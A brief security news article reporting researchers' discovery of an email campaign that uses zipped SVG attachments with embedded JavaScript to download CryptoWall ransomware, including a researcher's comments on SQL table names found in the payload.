SVG (scalable vector graphic), the XML based vector image format for two-dimensional graphics with support for interaction and animation is now being used to deliver malwares that encrypts your files and hold them to ransom.
Researchers at AppRiver have identified a malicious email campaign with zipped svg files attached in the messages. These SVG files contains a malicious JavaScript entry that opens a webpage to download a malware.
After analyzing the malicious SVG files, the researchers identified the payload- “CryptoWall“. Upon infection, it encrypts the files and then shows a message:
The downloaded file contained hard coded SQL commands related to a potential schools database, Jonathan French said in a blog post.
“Some of the recipients we stopped this malware for were schools, but nothing seemed out of the ordinary with volume of recipients, which was low volume in general,” he added.
Hidden Intensions
“While it’s possible the malware had other intentions from encrypting in mind, like to wreak havoc in a sql database, this was from a strings output so it was all plain text and the table naming conventions just seem a little too plain as well. However, someone knowing sql table names or a school using a plain naming convention could be problematic if the malware were to attempt to attain access and do its thing. It’s certainly also a tactic for malware authors to add in code that isn’t used or code that fluffs up functions to distract from analysis and make analyzing more complex and time consuming,” the researcher explains.